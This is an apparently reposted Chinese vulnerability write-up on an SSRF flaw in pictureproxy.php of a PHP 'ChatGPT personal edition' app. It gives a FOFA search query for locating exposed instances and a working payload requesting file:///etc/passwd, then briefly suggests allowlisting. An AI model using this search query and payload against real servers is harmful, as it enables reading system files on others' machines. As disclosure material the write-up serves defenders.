当前位置: 首页 > article >正文

chatgpt个人版ssrf漏洞

article 2024/11/15 15:46:22

文章目录

    • 免责申明
    • 搜索语法
    • 漏洞描述
    • 漏洞复现
    • 修复建议

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

title="ChatGPT个人专用版"

漏洞描述

该系统是一个开源的chatgpt系统,是PHP版调用OpenAI的API接口进行问答的模型,在prictureproxy.php文件处存在ssrf漏洞

漏洞复现

payload

GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: x.x.x.x

在这里插入图片描述

修复建议

修改源代码,进行黑白名单


http://www.kler.cn/a/308075.html

相关文章:

  • 多进程/线程并发服务器
  • 认识一下Unicorn
  • 【学习】Fine-tuning知识汇总
  • Linux 系统管理和监控命令---- auditctl命令
  • 4.4 软件设计:UML顺序图
  • 利用阿里云下载 WebRTC 源码
  • [Unity Demo]从零开始制作空洞骑士第三集之导入插件2D toolkit和使用playmaker制作敌人状态机以及扩展FSM脚本
  • CSP-J初赛每日题目2
  • 深度学习Day-33:Semi-Supervised GAN理论与实战
  • 【电脑组装】✈️从配置拼装到安装系统组装自己的台式电脑
  • 华为eNSP使用详解
  • 【编程底层原理】亿级数据表查询最后10条记录limit 99999990,10性能为啥特慢,而且数据库都被查宕机了
  • C语言中数据类型
  • PHP:强大的Web开发语言
  • nginx实现https安全访问的详细配置过程
  • Spring Boot-RESTful API相关问题
  • 开源 AI 智能名片链动 2+1 模式 O2O 商城小程序在社群活动中的应用与时机选择
  • 海外云手机怎么实现TikTok多账号防关联?
  • 【iOS逆向与安全】frida-trace命令大全
  • AI 时代程序员的应变之道
  • 数据分析-25-时间序列预测之基于keras的LSTM+注意力机制预测风速
  • MySQL —— 视图
  • Serverless 安全新杀器:云安全中心护航容器安全
  • 图神经网络模型扩展5--3
  • 完全背包问题(优化版二维)
  • 在 Red Hat 上安装 SQL Server 2022 并创建数据库